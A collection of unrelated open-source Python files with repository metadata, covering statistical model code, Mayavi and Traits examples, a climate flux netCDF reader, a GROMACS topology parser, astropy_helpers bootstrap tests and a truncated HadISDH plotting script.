exp_base_log_partition = safe_exp(self.base_model.log_partition(eta[1:]))
exp_x0 = safe_exp(eta[0])
denominator = exp_base_log_partition + exp_x0
w = (exp_base_log_partition / denominator)
return np.concatenate(((exp_x0 / denominator)[:,np.newaxis].T,
self.base_model.grad_log_partition(eta[1:]) * w), axis=0)
def hessian_log_partition(self, eta):
pass
def diagonal_hessian_log_partition(self, eta):
base_log_partition = self.base_model.log_partition(eta[1:])
exp_base_log_partition = safe_exp(base_log_partition)
exp_x0 = safe_exp(eta[0])
exp_sum = safe_exp(eta[0] + base_log_partition)
sum_exp = exp_base_log_partition + exp_x0
sq_sum_exp = safe_sq(sum_exp)
diag_hess_base = self.base_model.diagonal_hessian_log_partition(eta[1:])
sq_grad_base = safe_sq(self.base_model.grad_log_partition(eta[1:]))
numerator = np.zeros(diag_hess_base.shape)
numerator[:,sq_sum_exp != np.inf] = (sum_exp[sq_sum_exp != np.inf] * diag_hess_base[:, sq_sum_exp != np.inf] + exp_x0[sq_sum_exp != np.inf] * sq_grad_base[:, sq_sum_exp != np.inf]) / sq_sum_exp[sq_sum_exp != np.inf]
return np.concatenate(((exp_sum / sq_sum_exp)[:,np.newaxis].T,
exp_base_log_partition * numerator), axis=0)
def sample(self, eta, count=1):
exp_x0 = safe_exp(eta[0])
prob_x0 = exp_x0 / (exp_x0 + safe_exp(self.base_model.log_partition(eta[1:])))
results = np.zeros(count)
nonzero = np.random.random(size=count) > prob_x0
results[nonzero] = self.base_model.sample(eta[1:], count=nonzero.sum())
return results
def eta_constraints(self, eta):
base_constraints = self.base_model.eta_constraints(eta[:,1:]) if len(eta.shape) > 1 else self.base_model.eta_constraints(eta[1:])
return np.array([np.array([])] + [x for x in base_constraints])
def grad_eta_constraints(self, eta):
base_constraints = self.base_model.grad_eta_constraints(eta[:,1:]) if len(eta.shape) > 1 else self.base_model.grad_eta_constraints(eta[1:])
return np.array([np.array([])] + [x for x in base_constraints])
def diagonal_hessian_eta_constraints(self, eta):
base_constraints = self.base_model.diagonal_hessian_eta_constraints(eta[:,1:]) if len(eta.shape) > 1 else self.base_model.diagonal_hessian_eta_constraints(eta[1:])
return np.array([np.array([])] + [x for x in base_constraints])
def starting_x(self):
return np.zeros(1)
def __repr__(self):
return 'Zero-Inflated {0}'.format(self.base_model)
|
redreamality/vsmrfs
|
vsmrfs/exponential_families.py
|
Python
|
mit
| 11,657
|
[
"Gaussian"
] |
2263f82647e4cff5e23455ea86014ad954b319a91f171600c40d5d79c5e407bf
|
"""
Common code for mayavi tests.
"""
# Author: Prabhu Ramachandran <prabhu@aero.iitb.ac.in>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
import os.path
from traits.api import HasTraits, Any, Event, Callable
def fixpath(filename):
"""Given a relative file path it sets the path relative to this
directory. This allows us to run the tests from other directories
as well.
"""
return os.path.join(os.path.dirname(__file__), filename)
def get_example_data(fname):
"""Given a relative path to data inside the examples directory,
obtains the full path to the file.
"""
p = os.path.join('data', fname)
return os.path.abspath(fixpath(p))
|
dmsurti/mayavi
|
mayavi/tests/common.py
|
Python
|
bsd-3-clause
| 692
|
[
"Mayavi"
] |
f14b8879f19dfaaa747c4a35b14d4665f563bc1739b069839d1891096b9fe540
|
########################################
# Read ECMWF netcdf files for heat fluxes
#
# Created by: Peter Willetts
# Created on: 12/06/2014
#
# ECMWF heat and radiation flux - Read from netcdf
# filter by date, latitude and longitude
# calculate mean and total heat flux
# BEWARE!!! ECMWF flux descriptions may be the wrong way round, as well as upwards/downwards signs
# This script is designed to work with the total accumulated time-integrated fluxes
# So an accumulated flux in J/m2, divided by the number of seconds in the accumulation period (here 6 hours), gives W m^-2
#
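# Worked example: a 6-hour accumulated flux of 4.32e6 J/m2 corresponds to
# 4.32e6 / (60 * 60 * 6) = 200 W m^-2, which is the conversion applied below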
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import numpy as np
from netCDF4 import Dataset
import glob
import re
import os
import pickle
import datetime
#first_month=8
#first_day_of_month=
#last_month=9
#last_day=
time_min=datetime.datetime(2011,8,18,0,0,0,0)
time_max=datetime.datetime(2011,9,8,0,0,0,0)
lon_max = 116
lon_min = 34
lat_max= 40.
lat_min=-11.25
nc = Dataset('/nfs/a90/eepdw/Data/ERA_Iinterim_Heat_Rad_Fluxes/era_interim_netcdf_heat_rad_flux_evap_precip_6hr_timestep.nc')
hours_since=datetime.datetime(1900,1,1,0,0,0,0)
# Get min and max index positions for latitude and longitude
datetimes = np.array([datetime.timedelta(hours=float(i))+hours_since for i in nc.variables['time'][:]])
time_index= np.where((datetimes<=time_max) & (datetimes >= time_min))
la_index = np.where((nc.variables['latitude'][:]<=lat_max) & (nc.variables['latitude'][:] >= lat_min))
lo_index = np.where((nc.variables['longitude'][:]<=lon_max) & (nc.variables['longitude'][:] >= lon_min))
la_i_max = np.max(la_index)
la_i_min = np.min(la_index)
lo_i_max = np.max(lo_index)
lo_i_min = np.min(lo_index)
t_i_max = np.max(time_index)
t_i_min = np.min(time_index)
lat_amounts=la_i_max-la_i_min
lon_amounts=lo_i_max-lo_i_min
print nc
#latent_in = nc.variables['slhf'][t_i_min:t_i_max+1,la_i_min:la_i_max+1, lo_i_min:lo_i_max+1]/(60*60*12)
#sensible_in = nc.variables['sshf'][t_i_min:t_i_max+1,la_i_min:la_i_max+1, lo_i_min:lo_i_max+1]/(60*60*6)
lwave_in = nc.variables['str'][t_i_min:t_i_max+1,la_i_min:la_i_max+1, lo_i_min:lo_i_max+1]/(60*60*6)
swave_in = nc.variables['ssr'][t_i_min:t_i_max+1,la_i_min:la_i_max+1, lo_i_min:lo_i_max+1]/(60*60*6)
latitude_in = nc.variables['latitude'][la_index]
longitude_in = nc.variables['longitude'][lo_index]
time_in = datetimes[time_index]
##
#latent_mean = -np.mean(latent_in, axis=0, dtype=np.float64)
#sensible_mean = -np.mean(sensible_in, axis=0, dtype=np.float64)
swave_mean = np.mean(swave_in, axis=0, dtype=np.float64)
lwave_mean = np.mean(lwave_in, axis=0, dtype=np.float64)
# I don't think the ECMWF data is very well documented
# According to ECMWF descriptions 'swave_in' is solar (longwave - sounds wrong to me) downward radiation
# 'lwave_in' is thermal (shortwave - again sounds wrong) upward radiation
# 'latent_mean' is upward
# 'sensible_mean' is upward
# From UM calc - pcubetotal = Downward shortwave + Downward longwave flux - Upward sensible - Upward latent heat
# Even though the ECMWF latent/sensible heat flux is 'upwards', the signs are opposite to those in the EMBRACE data etc
#total_mean = swave_mean + lwave_mean - sensible_mean - latent_mean
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_latent_mean', latent_mean)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_sensible_mean', sensible_mean)
np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_swave_mean', swave_mean)
np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_lwave_mean', lwave_mean)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_total_mean', total_mean)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_lats', latitude_in)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_longs', longitude_in)
#np.save('/nfs/a90/eepdw/Data/Saved_data/era_i/Fluxes/era_i_emb_times_6h', time_in)
if __name__ == '__main__':
    pass  # all processing above runs at module level
|
peterwilletts24/Python-Scripts
|
era_interim/netcdf_fileread_heat_fluxes_6hourly_rad.py
|
Python
|
mit
| 4,215
|
[
"NetCDF"
] |
4767434a966fa2ebae7ccd48af2f39a9883e767c7d7227257aa027a35926c073
|
# Copyright (c) 2007, Enthought, Inc.
# License: BSD Style.
# all_traits_features.py --- Shows primary features of the Traits
# package
#--[Imports]--------------------------------------------------------------------
from traits.api import Delegate, HasTraits, Instance, Int, Str
#--[Code]-----------------------------------------------------------------------
# Shows the five primary features of the Traits package.
class Parent ( HasTraits ):
    # INITIALIZATION: 'last_name' is initialized to '':
last_name = Str( '' )
class Child ( HasTraits ):
age = Int
# VALIDATION: 'father' must be a Parent instance:
father = Instance( Parent )
# DELEGATION: 'last_name' is delegated to father's 'last_name':
last_name = Delegate( 'father' )
# NOTIFICATION: This method is called when 'age' changes:
def _age_changed ( self, old, new ):
print 'Age changed from %s to %s ' % ( old, new )
#--[Example*]-------------------------------------------------------------------
# Set up the example:
joe = Parent()
joe.last_name = 'Johnson'
moe = Child()
moe.father = joe
# DELEGATION in action:
print "Moe's last name is %s " % moe.last_name
# Result:
# Moe's last name is Johnson
# NOTIFICATION in action
moe.age = 10
# Result:
# Age changed from 0 to 10
# VISUALIZATION: Displays a UI for editing moe's
# attributes (if a supported GUI toolkit is installed)
moe.configure_traits()
|
burnpanck/traits
|
examples/tutorials/doc_examples/examples/all_traits_features.py
|
Python
|
bsd-3-clause
| 1,454
|
[
"MOE"
] |
2d4611e8b0718049781f9b9f345f6ad18b8e8cfba05391a56ad76eb9479a66e1
|
#!/usr/bin/python
import sys,os
nonbonded = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/ffnonbonded.itp'
rtp = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/aminoacids.rtp'
watermodel = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/tip3p.itp'
class gmxtop:
# private variables
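    # note: these are class-level attributes, shared by every gmxtop instance;
    # constructing a second instance appends to the same lists and dicts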
_atomtype = list()
_charge = dict()
_vdw = dict()
_resitype = list()
_resi = dict()
## For Amber atoms
_resi_amber = dict()
_resitype_amber = list() ##
def __init__(self,nonbondfile=nonbonded,rtpfile=rtp,waterfile=watermodel):
self.make_gmx2amb_table()
for line in open(nonbondfile):
if line.strip()[0] not in (';','['):
items = line.split()
t = items[0]
                sigma = float(items[5])
                epsilon = float(items[6])
                self._atomtype.append(t)
                self._vdw[t] = sigma, epsilon
for name,resilines in self._nextresiline(rtpfile):
self._resitype.append(name)
### for Amber name
self._resitype_amber.append(name) #
self._resi[name] = list()
self._resi_amber[name] = list()
for line in resilines:
items = line.split()
n = items[0]
### For Amber name
na = self.get_gmx2amb_name(name,n) ##
t = items[1]
c = float(items[2])
s,e = self._vdw[t]
self._resi[name].append( (n,s,e,c) )
if name == 'NA':
self._resitype.append('Na')
self._resi['Na'] = [ ('Na',s,e,c) ]
if name == 'CL':
self._resitype.append('Cl')
self._resi['Cl'] = [ ('Cl',s,e,c) ]
### For Amber name
self._resi_amber[name].append( (na,s,e,c) ) ###
for name,resilines in self._nextresiline(waterfile):
name = 'HOH'
self._resitype.append(name)
self._resi[name] = list()
for line in resilines:
items = line.split()
n = items[4]
t = items[1]
c = float(items[6])
s,e = self._vdw[t]
self._resi[name].append( (n,s,e,c) )
def _nextresiline(self,rtpfile):
lines = list()
name = None
atomflag = False
for line in open(rtpfile):
if not line.strip():
continue
elif line.strip()[0] in ('#',';'):
continue
elif '[' in line and ']' in line:
mid = line.split()[1]
if len(mid) <= 4:
if len(lines) != 0:
yield name,lines
name = mid
lines = list()
else:
pass
if mid == 'atoms' :
atomflag = True
else:
atomflag = False
else:
if atomflag :
if line.strip() != '' :
lines.append(line)
else:
pass
yield name,lines
def get_resilist(self):
return self._resitype
def get_resilist_amber(self):
return self._resitype_amber
def get_resi( self, name ):
return self._resi[name]
def get_resi_amber( self, name ):
return self._resi_amber[name]
def debug(self):
print((self._resitype))
print("Na")
tmp = self.get_resi("Na")
for key in tmp:
print(key)
def make_gmx2amb_table(self):
self.gmx2amb_table = dict()
self.wildcard_types = dict()
for line in self.gmx2amb_table_str.split('|'):
resi,namea,nameb = line.split(':')
resi = resi.strip()
namea = namea.strip()
if namea[0] in '0123456789' :
namea = namea[1:]+namea[0]
nameb = nameb.strip()
if nameb[0] in '0123456789' :
nameb = nameb[1:]+nameb[0]
if resi != "*":
if resi in self.gmx2amb_table:
self.gmx2amb_table[resi][namea]=nameb
else:
self.gmx2amb_table[resi] = dict()
self.gmx2amb_table[resi][namea]=nameb
else:
self.wildcard_types[namea] = nameb
pass
def get_gmx2amb_name(self, resi,n ):
if n in self.wildcard_types:
return self.wildcard_types[n]
else:
            try:
                return self.gmx2amb_table[resi][n]
            except KeyError:
                return n
gmx2amb_table_str = ''' WAT: OW : O|
WAT:1HW : H1|
WAT:2HW : H2|
ILE:1HG2:HG21|
ILE:2HG2:HG22|
ILE:3HG2:HG23|
ILE:1HG1:HG12|
ILE:2HG1:HG13|
ILE: HD1:HD11|
ILE: HD2:HD12|
ILE: HD3:HD13|
ILE: CD : CD1|
VAL:1HG1:HG11|
VAL:2HG1:HG12|
VAL:3HG1:HG13|
VAL:1HG2:HG21|
VAL:2HG2:HG22|
VAL:3HG2:HG23|
GLY: HA1: HA2|
GLY: HA2: HA3|
TYR: HB1: HB2|
TYR: HB2: HB3|
THR:1HG2:HG21|
THR:2HG2:HG22|
THR:3HG2:HG23|
CYS: HB1: HB2|
CYS: HB2: HB3|
CYX: HB1: HB2|
CYX: HB2: HB3|
ASN: HB1: HB2|
ASN: HB2: HB3|
ASN:1HD2:HD21|
ASN:2HD2:HD22|
PRO: HD1: HD2|
PRO: HD2: HD3|
PRO: HG1: HG2|
PRO: HG2: HG3|
PRO: HB1: HB2|
PRO: HB2: HB3|
GLN: HB1: HB2|
GLN: HB2: HB3|
GLN: HG1: HG2|
GLN: HG2: HG3|
GLN:1HE2:HE21|
GLN:2HE2:HE22|
SER: HB1: HB2|
SER: HB2: HB3|
LEU: HB1: HB2|
LEU: HB2: HB3|
LEU:1HD1:HD11|
LEU:2HD1:HD12|
LEU:3HD1:HD13|
LEU:1HD2:HD21|
LEU:2HD2:HD22|
LEU:3HD2:HD23|
MET: HB1: HB2|
MET: HB2: HB3|
MET: HG2: HG3|
MET: HG1: HG2|
PHE: HB1: HB2|
PHE: HB2: HB3|
TRP: HB1: HB2|
TRP: HB2: HB3|
ASP: HB1: HB2|
ASP: HB2: HB3|
GLU: HB1: HB2|
GLU: HB2: HB3|
GLU: HG1: HG2|
GLU: HG2: HG3|
HIP: HB1: HB2|
HIP: HB2: HB3|
HIS: HB1: HB2|
HIS: HB2: HB3|
HID: HB1: HB2|
HID: HB2: HB3|
HIE: HB1: HB2|
HIE: HB2: HB3|
LYS: HB1: HB2|
LYS: HB2: HB3|
LYS: HG1: HG2|
LYS: HG2: HG3|
LYS: HD1: HD2|
LYS: HD2: HD3|
LYS: HE1: HE2|
LYS: HE2: HE3|
ARG: HB1: HB2|
ARG: HB2: HB3|
ARG: HG1: HG2|
ARG: HG2: HG3|
ARG: HD1: HD2|
ARG: HD2: HD3|
ARG:1HH1:HH11|
ARG:2HH1:HH12|
ARG:1HH2:HH21|
ARG:2HH2:HH22|
HOH: OW : O|
HOH: HW1: H1|
HOH:1HW : H1|
HOH: HW2: H2|
HOH:2HW : H2|
NA : NA : Na |
CL : CL : Cl |
*: OC1: O |
*: OC2: OXT|
*: H1: H1 |
*: H2: H2 |
*: H3: H3 '''
if __name__ == '__main__' :
nonbonded = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/ffnonbonded.itp'
rtp = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/aminoacids.rtp'
watermodel = '/home/fuqy/Software/gromacs-5.1.4/share/top/amber99sb.ff/tip3p.itp'
top = gmxtop(nonbonded, rtp , watermodel)
top.debug()
# print(top.get_resilist_amber())
|
hnlab/fpdb
|
fpdb/gmx_top.py
|
Python
|
mit
| 7,752
|
[
"Amber",
"Gromacs"
] |
ed6e930196960272c4609cd2ffe0fe67646d7ee7ee7a8e19adabf6b818322fce
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.modeling.data.component Contains the DataComponent class
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ..component.galaxy import GalaxyModelingComponent
from ...core.tools import filesystem as fs
from ...core.tools import strings
# -----------------------------------------------------------------
galex = "GALEX"
sdss = "SDSS"
twomass = "2MASS"
spitzer = "Spitzer"
wise = "WISE"
herschel = "Herschel"
planck = "Planck"
other = "Other"
halpha = "Halpha"
# -----------------------------------------------------------------
data_origins = [galex, sdss, halpha, twomass, spitzer, wise, herschel, planck, other]
# -----------------------------------------------------------------
def instrument_to_origin(instrument):
"""
This function ...
:param instrument:
:return:
"""
if instrument.lower() == "pacs": return "Herschel"
elif instrument.lower() == "spire": return "Herschel"
elif instrument.lower() == "lfi": return "Planck"
elif instrument.lower() == "hfi": return "Planck"
else: return strings.find_any_case(instrument, data_origins)
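    # e.g. instrument_to_origin("PACS") -> "Herschel"; instrument_to_origin("hfi") -> "Planck"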
# -----------------------------------------------------------------
class DataComponent(GalaxyModelingComponent):
"""
This class...
"""
def __init__(self, *args, **kwargs):
"""
The constructor ...
:param kwargs:
:return:
"""
# Call the constructor of the base class
super(DataComponent, self).__init__(*args, **kwargs)
# -- Attributes --
# Different origins
self.data_origins = data_origins
# The paths to the data/images/ directories for the different origins
self.data_images_paths = dict()
        # The path to the urls file (set in setup)
self.urls_path = None
# -----------------------------------------------------------------
def setup(self, **kwargs):
"""
This function ...
:return:
"""
# Call the setup function of the base class
super(DataComponent, self).setup(**kwargs)
        # Create a data/images subdirectory for each origin
for origin in self.data_origins: self.data_images_paths[origin] = fs.create_directory_in(self.data_images_path, origin)
# Set the urls path
self.urls_path = fs.join(self.data_images_path, "urls.dat")
# -----------------------------------------------------------------
|
SKIRT/PTS
|
modeling/data/component.py
|
Python
|
agpl-3.0
| 2,859
|
[
"Galaxy"
] |
11ab1b59dadae9314a29eefd2df416d2b6c6c6860d32ed73de674ce369d78cae
|
import glob
import os
import textwrap
from setuptools.package_index import PackageIndex
from setuptools.sandbox import run_setup
import pytest
from . import run_cmd, testpackage
from ..utils import silence
TEST_SETUP_PY = """\
#!/usr/bin/env python
from __future__ import print_function
import os
import sys
import ah_bootstrap
# reset the name of the package installed by ah_bootstrap to
# _astropy_helpers_test_--this will prevent any confusion by pkg_resources with
# any already installed packages named astropy_helpers
# We also disable auto-upgrade by default
ah_bootstrap.DIST_NAME = 'astropy-helpers-test'
ah_bootstrap.PACKAGE_NAME = '_astropy_helpers_test_'
ah_bootstrap.AUTO_UPGRADE = False
try:
ah_bootstrap.use_astropy_helpers({args})
finally:
ah_bootstrap.DIST_NAME = 'astropy-helpers'
ah_bootstrap.PACKAGE_NAME = 'astropy_helpers'
ah_bootstrap.AUTO_UPGRADE = True
import _astropy_helpers_test_
filename = os.path.abspath(_astropy_helpers_test_.__file__)
filename = filename.replace('.pyc', '.py') # More consistent this way
print(filename)
"""
def test_bootstrap_from_submodule(tmpdir, testpackage, capsys):
"""
Tests importing _astropy_helpers_test_ from a submodule in a git
repository. This tests actually performing a fresh clone of the repository
without the submodule initialized, and that importing astropy_helpers in
that context works transparently after calling
    `ah_bootstrap.use_astropy_helpers`.
"""
orig_repo = tmpdir.mkdir('orig')
# Ensure ah_bootstrap is imported from the local directory
import ah_bootstrap
with orig_repo.as_cwd():
run_cmd('git', ['init'])
# Write a test setup.py that uses ah_bootstrap; it also ensures that
# any previous reference to astropy_helpers is first wiped from
# sys.modules
orig_repo.join('setup.py').write(TEST_SETUP_PY.format(args=''))
run_cmd('git', ['add', 'setup.py'])
# Add our own clone of the astropy_helpers repo as a submodule named
# astropy_helpers
run_cmd('git', ['submodule', 'add', str(testpackage),
'_astropy_helpers_test_'])
run_cmd('git', ['commit', '-m', 'test repository'])
os.chdir(str(tmpdir))
# Creates a clone of our test repo in the directory 'clone'
run_cmd('git', ['clone', 'orig', 'clone'])
os.chdir('clone')
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
path = stdout.strip()
# Ensure that the astropy_helpers used by the setup.py is the one that
# was imported from git submodule
assert path == str(tmpdir.join('clone', '_astropy_helpers_test_',
'_astropy_helpers_test_',
'__init__.py'))
def test_check_submodule_no_git(tmpdir, testpackage):
"""
Tests that when importing astropy_helpers from a submodule, it is still
recognized as a submodule even when using the --no-git option.
In particular this ensures that the auto-upgrade feature is not activated.
"""
orig_repo = tmpdir.mkdir('orig')
# Ensure ah_bootstrap is imported from the local directory
import ah_bootstrap
with orig_repo.as_cwd():
run_cmd('git', ['init'])
# Write a test setup.py that uses ah_bootstrap; it also ensures that
# any previous reference to astropy_helpers is first wiped from
# sys.modules
args = 'auto_upgrade=True'
orig_repo.join('setup.py').write(TEST_SETUP_PY.format(args=args))
run_cmd('git', ['add', 'setup.py'])
# Add our own clone of the astropy_helpers repo as a submodule named
# astropy_helpers
run_cmd('git', ['submodule', 'add', str(testpackage),
'_astropy_helpers_test_'])
run_cmd('git', ['commit', '-m', 'test repository'])
# Temporarily patch _do_upgrade to fail if called
class UpgradeError(Exception):
pass
def _do_upgrade(*args, **kwargs):
raise UpgradeError()
orig_do_upgrade = ah_bootstrap._do_upgrade
ah_bootstrap._do_upgrade = _do_upgrade
try:
run_setup('setup.py', ['--no-git'])
except UpgradeError:
pytest.fail('Attempted to run auto-upgrade despite importing '
'_astropy_helpers_test_ from a git submodule')
finally:
ah_bootstrap._do_upgrade = orig_do_upgrade
def test_bootstrap_from_directory(tmpdir, testpackage, capsys):
"""
Tests simply bundling a copy of the astropy_helpers source code in its
entirety bundled directly in the source package and not in an archive.
"""
import ah_bootstrap
source = tmpdir.mkdir('source')
testpackage.copy(source.join('_astropy_helpers_test_'))
with source.as_cwd():
source.join('setup.py').write(TEST_SETUP_PY.format(args=''))
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
stdout = stdout.splitlines()
if stdout:
path = stdout[-1].strip()
else:
path = ''
# Ensure that the astropy_helpers used by the setup.py is the one that
# was imported from git submodule
assert path == str(source.join('_astropy_helpers_test_',
'_astropy_helpers_test_',
'__init__.py'))
def test_bootstrap_from_archive(tmpdir, testpackage, capsys):
"""
Tests importing _astropy_helpers_test_ from a .tar.gz source archive
shipped alongside the package that uses it.
"""
orig_repo = tmpdir.mkdir('orig')
# Ensure ah_bootstrap is imported from the local directory
import ah_bootstrap
# Make a source distribution of the test package
with silence():
run_setup(str(testpackage.join('setup.py')),
['sdist', '--dist-dir=dist', '--formats=gztar'])
dist_dir = testpackage.join('dist')
for dist_file in dist_dir.visit('*.tar.gz'):
dist_file.copy(orig_repo)
with orig_repo.as_cwd():
# Write a test setup.py that uses ah_bootstrap; it also ensures that
# any previous reference to astropy_helpers is first wiped from
# sys.modules
args = 'path={0!r}'.format(os.path.basename(str(dist_file)))
orig_repo.join('setup.py').write(TEST_SETUP_PY.format(args=args))
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
path = stdout.splitlines()[-1].strip()
# Installation from the .tar.gz should have resulted in a .egg
# directory that the _astropy_helpers_test_ package was imported from
eggs = glob.glob('*.egg')
assert eggs
egg = orig_repo.join(eggs[0])
assert os.path.isdir(str(egg))
assert path == str(egg.join('_astropy_helpers_test_',
'__init__.py'))
def test_download_if_needed(tmpdir, testpackage, capsys):
"""
Tests the case where astropy_helpers was not actually included in a
package, or is otherwise missing, and we need to "download" it.
This does not test actually downloading from the internet--this is normally
done through setuptools' easy_install command which can also install from a
    source archive. From the point of view of ah_bootstrap the two actions are
equivalent, so we can just as easily simulate this by providing a setup.cfg
giving the path to a source archive to "download" (as though it were a
URL).
"""
source = tmpdir.mkdir('source')
# Ensure ah_bootstrap is imported from the local directory
import ah_bootstrap
# Make a source distribution of the test package
with silence():
run_setup(str(testpackage.join('setup.py')),
['sdist', '--dist-dir=dist', '--formats=gztar'])
dist_dir = testpackage.join('dist')
with source.as_cwd():
source.join('setup.py').write(TEST_SETUP_PY.format(args=''))
source.join('setup.cfg').write(textwrap.dedent("""\
[easy_install]
find_links = {find_links}
""".format(find_links=str(dist_dir))))
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
# Just take the last line--on Python 2.6 distutils logs warning
# messages to stdout instead of stderr, causing them to be mixed up
# with our expected output
path = stdout.splitlines()[-1].strip()
# easy_install should have worked by 'installing' astropy_helpers as a
# .egg in the current directory
eggs = glob.glob('*.egg')
assert eggs
egg = source.join(eggs[0])
assert os.path.isdir(str(egg))
assert path == str(egg.join('_astropy_helpers_test_',
'__init__.py'))
def test_upgrade(tmpdir, capsys):
# Run the testpackage fixture manually, since we use it multiple times in
# this test to make different versions of _astropy_helpers_test_
orig_dir = testpackage(tmpdir.mkdir('orig'))
# Make a test package that uses _astropy_helpers_test_
source = tmpdir.mkdir('source')
dist_dir = source.mkdir('dists')
orig_dir.copy(source.join('_astropy_helpers_test_'))
with source.as_cwd():
setup_py = TEST_SETUP_PY.format(args='auto_upgrade=True')
source.join('setup.py').write(setup_py)
# This will be used to later to fake downloading the upgrade package
source.join('setup.cfg').write(textwrap.dedent("""\
[easy_install]
find_links = {find_links}
""".format(find_links=str(dist_dir))))
# Make additional "upgrade" versions of the _astropy_helpers_test_
# package--one of them is version 0.2 and the other is version 0.1.1. The
# auto-upgrade should ignore version 0.2 but use version 0.1.1.
upgrade_dir_1 = testpackage(tmpdir.mkdir('upgrade_1'), version='0.2')
upgrade_dir_2 = testpackage(tmpdir.mkdir('upgrade_2'), version='0.1.1')
dists = []
# For each upgrade package go ahead and build a source distribution of it
# and copy that source distribution to a dist directory we'll use later to
# simulate a 'download'
for upgrade_dir in [upgrade_dir_1, upgrade_dir_2]:
with silence():
run_setup(str(upgrade_dir.join('setup.py')),
['sdist', '--dist-dir=dist', '--formats=gztar'])
dists.append(str(upgrade_dir.join('dist')))
for dist_file in upgrade_dir.visit('*.tar.gz'):
dist_file.copy(source.join('dists'))
# Monkey with the PackageIndex in ah_bootstrap so that it is initialized
# with the test upgrade packages, and so that it does not actually go out
# to the internet to look for anything
import ah_bootstrap
class FakePackageIndex(PackageIndex):
def __init__(self, *args, **kwargs):
PackageIndex.__init__(self, *args, **kwargs)
self.to_scan = dists
def find_packages(self, requirement):
# no-op
pass
ah_bootstrap.PackageIndex = FakePackageIndex
try:
with source.as_cwd():
# Now run the source setup.py; this test is similar to
# test_download_if_needed, but we explicitly check that the correct
# *version* of _astropy_helpers_test_ was used
run_setup('setup.py', [])
stdout, stderr = capsys.readouterr()
path = stdout.splitlines()[-1].strip()
eggs = glob.glob('*.egg')
assert eggs
egg = source.join(eggs[0])
assert os.path.isdir(str(egg))
assert path == str(egg.join('_astropy_helpers_test_',
'__init__.py'))
assert 'astropy_helpers_test-0.1.1-' in str(egg)
finally:
ah_bootstrap.PackageIndex = PackageIndex
|
eteq/astropy-helpers
|
astropy_helpers/tests/test_ah_bootstrap.py
|
Python
|
bsd-3-clause
| 11,986
|
[
"VisIt"
] |
c90e5db5bc8afc8c9da36d40b4a7025bfba1912c672c39c1364a6edf0183b142
|
#!/usr/local/sci/bin/python
#***************************************
# 1 April 2014 KMW - v1
# Plots global time series from netCDF - cannot work with uncertainties right now
#
#************************************************************************
# START
#************************************************************************
# USE python2.7
# python2.7 PlotNiceTimeSeries_MAR2014.py
#
# REQUIRES
#
#************************************************************************
# Set up python imports
import matplotlib.pyplot as plt
import numpy as np
import sys, os
import scipy.stats
import struct
import os.path
import math
from mpl_toolkits.basemap import Basemap
import datetime as dt
from matplotlib.dates import date2num,num2date
#from netCDF4 import Dataset
from scipy.io import netcdf
from RandomsRanges import LetterRange
import copy
from LinearTrends import MedianPairwise
# Set up initial run choices
timetype='annual' #'monthly', 'annual'
nparams=7
param=list(['q','e','rh','tw','td','t','dpd']) # tw, q, e, rh, t, td, dpd
param2=list(['q','e','RH','Tw','Td','T','DPD']) # Tw, q, e, RH, T, Td, DPD
unitees=list(['g/kg','hPa','%rh','degrees C','degrees C','degrees C','degrees C'])
nowmon='MAR'
nowyear='2018'
thenmon='JAN'
thenyear='2018'
version='4.0.0.2017f'
styr=1973
edyr=2017
nyrs=(edyr-styr)+1
nmons=(nyrs)*12
climst=1981
climed=2010
stcl=climst-styr
edcl=climed-styr
# Set up directories and files
PLOTDIR='/data/local/hadkw/HADCRUH2/UPDATE'+str(edyr)+'/IMAGES/TIMESERIES/'
DATADIR='/data/local/hadkw/HADCRUH2/UPDATE'+str(edyr)+'/STATISTICS/TIMESERIES/'
IfType='.nc' #'.nc','.dat'
#INHFILEST='HadISDH.land'
##INHFILEED='5by5_'+thenmon+thenyear+'_areaTS_19732013'
#if timetype == 'monthly':
# INHFILEED='.'+version+'_global_ts_monthly_'+thenmon+thenyear+'.dat'
#else:
# INHFILEED='.'+version+'_global_ts_annual_'+thenmon+thenyear+'.dat'
#INOTHFULL='_areaTS_19732013'
#INOTHMASK='_HadISDHMASKareaTS_19732013'
#InFilSt = 'BLEND_'
#InFilMd = ['HadISDH.landq.2.1.0.2015p.marineq.QC0.0.0',
# 'HadISDH.lande.2.1.0.2015p.marinee.QC0.0.0',
# 'HadISDH.landRH.2.1.0.2015p.marineRH.QC0.0.0',
# 'HadISDH.landTw.2.1.0.2015p.marineTw.QC0.0.0',
# 'HadISDH.landTd.2.1.0.2015p.marineTd.QC0.0.0',
# 'HadISDH.landT.2.1.0.2015p.marineT.QC0.0.0',
# 'HadISDH.landDPD.2.1.0.2015p.marineDPD.QC0.0.0']
#InFilEd = '_APR2016_areaTS_19732015'
InFilSt = 'HadISDH.land'
InFilMd = '.'+version+'_FLATgridIDPHA5by5'
#InFilMd = ['q.'+version+'_FLATgridIDPHA5by5',
# 'e.2.1.0.2015p_FLATgridIDPHA5by5',
# 'RH.2.1.0.2015p_FLATgridIDPHA5by5',
# 'Tw.2.1.0.2015p_FLATgridIDPHA5by5',
